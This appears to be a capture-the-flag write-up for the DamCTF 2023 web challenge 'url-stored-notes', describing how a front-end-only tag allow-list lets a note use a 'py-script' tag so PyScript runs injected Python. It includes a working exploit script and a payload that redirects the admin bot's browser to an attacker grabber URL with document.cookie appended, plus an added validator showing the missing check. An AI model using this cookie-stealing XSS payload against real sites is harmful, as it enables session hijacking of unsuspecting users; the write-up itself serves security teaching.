>M1ll_0n
>41 solves / 459 points
>
>Ever seen that neat paste program by topaz for advent of code? Yeah, well this is like 100% better and more secure since it's for note card sharing.
Admin bot at /admin
>
>http://url-stored-notes.chals.damctf.xyz
>
>http://64.227.26.193
>
>[url-notes.zip](https://rctf-bucket.storage.googleapis.com/uploads/785b930a6369cfb78baea2bb62079266bb48d5e4d6ae52d918a7f5eee20bebec/url-notes.zip)

The challenge ships with its source code. Reading it shows that the goal is to steal the admin bot's cookie through XSS.

The site is a note board: you enter a prompt and an answer, and it generates a temporary link for them.

![20230408142400](https://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/20230408142400.png)

Opening the temporary link displays the content we submitted.

![20230408142621](https://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/20230408142621.png)

Normally the content we submit is assigned through `textContent`, so the browser never parses it as HTML:

```js
promptElement.textContent = prompt;
answerElement.textContent = answer;
```

What matters here is that the allowed tags are restricted only in the front-end form code; the tag name is stored in the note data alongside the prompt and answer, so any other tag can be supplied directly by building the note ourselves:
```js
const SUPPORTED_TAGS = ['p', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'i', 'code'];
```
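The following is an added example, not code from the original writeup or from the challenge source. It models the note format the exploit below relies on (a JSON list, lzma-compressed, base64-encoded, stored in the URL fragment), shows why a form-side allow-list is no control at all (the fragment never leaves the browser, so the server cannot check it), and shows the render-time check the page is missing. The base URL is taken from the challenge description; the function names and the assumption that a note without a valid `tag` should be rejected are mine.

```python
# Added example, not part of the original writeup or the challenge code.
# Models the note encoding used by the site and the exploit below:
#   fragment = base64( lzma( json(notes) ) )
# and adds the render-time allow-list check that the page does not perform.
import base64
import json
import lzma
from urllib.parse import urlsplit

SUPPORTED_TAGS = ['p', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'i', 'code']
# From the challenge description; the path layout is an assumption.
BASE_URL = "http://url-stored-notes.chals.damctf.xyz/"


def encode_notes(notes):
    """Serialise notes the way the site stores them: JSON -> lzma -> base64."""
    raw = json.dumps(notes).encode()
    return base64.b64encode(lzma.compress(raw)).decode()


def decode_notes(fragment):
    """Reverse of encode_notes: base64 -> lzma -> JSON."""
    raw = lzma.decompress(base64.b64decode(fragment))
    return json.loads(raw.decode('utf-8'))


def build_share_url(notes):
    """The 'temporary link': the whole note payload lives in the fragment."""
    return BASE_URL + "#" + encode_notes(notes)


def server_visible_part(url):
    """What an HTTP request for this URL actually carries.

    Browsers strip everything after '#' before sending the request, so the
    server never sees the notes and cannot enforce the tag allow-list.
    """
    parts = urlsplit(url)
    return parts.scheme + "://" + parts.netloc + parts.path


def validate_notes(notes):
    """Render-time check the page lacks (hypothetical hardening).

    Every note must be an object with string prompt/answer and a tag from
    SUPPORTED_TAGS. Anything else (e.g. tag 'py-script') is rejected before
    any element is created, because PyScript would execute the text of a
    <py-script> element as Python regardless of how it was assigned.
    """
    if not isinstance(notes, list):
        raise ValueError("notes must be a list")
    for i, note in enumerate(notes):
        if not isinstance(note, dict):
            raise ValueError(f"note {i}: not an object")
        tag = note.get('tag')
        if tag not in SUPPORTED_TAGS:
            raise ValueError(f"note {i}: tag {tag!r} is not allowed")
        for field in ('prompt', 'answer'):
            if not isinstance(note.get(field, ''), str):
                raise ValueError(f"note {i}: {field} must be a string")
    return notes


if __name__ == "__main__":
    # Constructed sample notes: one benign, one using the unlisted tag.
    benign = [{'prompt': 'What is 2+2?', 'answer': '4', 'tag': 'h1'}]
    malicious = [{'prompt': 'import js\nprint(js.document.cookie)',
                  'answer': '', 'tag': 'py-script'}]
    url = build_share_url(malicious)
    print("share URL:", url)
    print("what the server receives:", server_visible_part(url))
    print("benign passes:", validate_notes(benign) == benign)
    try:
        validate_notes(malicious)
    except ValueError as err:
        print("malicious rejected:", err)
```

The point of `server_visible_part` is that a request library or a server-side filter cannot help here: the only place the allow-list can be enforced is in the JavaScript that turns a decoded note into a DOM element, and that is exactly the place the site skips.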

The site uses PyScript to manipulate page elements. PyScript executes the text of any `<py-script>` element as Python, so if we set the note's tag to `py-script`, the text the page assigns with `textContent` becomes Python source and runs. That lets us inject an XSS payload written in Python:

The PyScript payload is simple: it creates a `<script>` element whose body redirects the page to an attacker-controlled grabber with `document.cookie` appended, and inserts it into `<head>`. A script element created with `createElement` and appended this way is executed by the browser (unlike script tags inserted through a parent's `innerHTML`). The `xxxxxxx` host is the attacker's own listener.
```py
import js  # PyScript bridge to the browser's JavaScript objects

# Build a <script> element; its body redirects the admin bot's browser to
# the attacker's grabber with the cookie in the query string.
script_tag = js.document.createElement('script')
script_tag.innerHTML = "document.location='http://xxxxxxx/XSS/grabber.php?c='+document.cookie;"
# Appending a freshly created script element executes it.
js.document.head.appendChild(script_tag)
```

exp.py
```py
from base64 import b64encode, b64decode
from lzma import compress, decompress
import json
import requests


def note_decode(encodedNotes):
    """Reverse the site's encoding: base64 -> lzma -> JSON."""
    encoded_notes = encodedNotes.encode()
    decoded_notes = decompress(b64decode(encoded_notes))
    notes = json.loads(decoded_notes.decode('utf-8'))
    return notes


def note_encode(Notes):
    """Encode notes the way the site does: JSON -> lzma -> base64."""
    encoded_notes = json.dumps(Notes)
    encoded_notes = compress(encoded_notes.encode())
    encoded_notes = b64encode(encoded_notes).decode()
    return encoded_notes


def send_request(data):
    # The notes live in the URL fragment, which is never sent to the server,
    # so this GET only confirms the host answers. The payload fires when the
    # admin bot opens the link in its browser.
    url = "http://64.227.26.193/#{}".format(data)
    res = requests.get(url)
    print(res.text)


if __name__ == "__main__":
    note = [
        {
            # The prompt becomes the text of a <py-script> element, i.e. Python source.
            'prompt': '''
import js

script_tag = js.document.createElement('script')

script_tag.innerHTML = "document.location='http://xxxxxxx/XSS/grabber.php?c='+document.cookie;"

js.document.head.appendChild(script_tag)
''',
            'answer': '',
            'tag': 'py-script',  # not in SUPPORTED_TAGS; only the form enforces that list
        }
    ]
    encoded_note = note_encode(note)
    # Submit http://url-stored-notes.chals.damctf.xyz/#<encoded_note> to the admin bot at /admin.
    print(encoded_note)
    # send_request(encoded_note)
```

The flow is as follows:
```mermaid
sequenceDiagram
participant Attacker
participant Website as Website Frontend
participant Admin_Bot as Admin Bot

Attacker->>Website: Access website
Attacker->>Website: Enter prompt and answer
Website->>Attacker: Generate temporary link
Attacker->>Admin_Bot: Submit temporary link

Note over Attacker,Website: Bypass front-end tag limitation
Attacker->>Website: Inject py-script with XSS payload

Website->>Attacker: Generate temporary link

Attacker->>Admin_Bot: Submit temporary link

Admin_Bot->>Attacker: Trigger XSS payload and send stolen cookies

```

[original writeup](https://dummykitty.github.io/2023/04/09/DamCTF-2023-Writeup-Web/#url-stored-notes)